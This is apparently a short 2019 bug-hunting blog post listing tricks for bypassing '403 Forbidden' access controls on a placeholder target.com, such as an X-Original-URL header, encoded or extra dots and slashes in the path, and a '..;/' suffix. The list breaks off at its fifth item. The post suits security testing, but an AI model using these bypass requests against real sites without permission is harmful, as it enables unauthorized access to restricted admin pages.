Posts 403
Post
Cancel

403

Posted Aug 9, 2019 2019-08-09T00:00:00+02:00 by Ahmed Salah Abdalhfaz

Click here

title: How I passed 403 author: Elsfa7-110 categories: [403, Tutorial] tags: [403] pin: true —

403 Forbidden Bypass

  1. Using “X-Original-URL” header
    1
2

    GET /admin HTTP/1.1
Host: target.com

    Try this to bypass

    1
2
3

    GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
  2. Appending %2e after the first slash
    1

    http://target.com/admin => 403

    Try this to bypass

    1

    http://target.com/%2e/admin => 200
  3. Try add dot (.) and slash (/) in the URL
    1

    http://target.com/admin => 403

    Try this to bypass

    1
2
3

    http://target.com/admin/. => 200
http://target.com//admin// => 200
http://target.com/./admin/./ => 200
  4. Add “..;/” after the directory name
    1

    http://target.com/admin

    Try this to bypass

    1

    http://target.com/admin..;/
  5. Try to uppercase the alphabet in the url ```
This post is licensed under CC BY 4.0 by the author.
Contents

Write A New Post

Cve 2020 3187

Trending Tags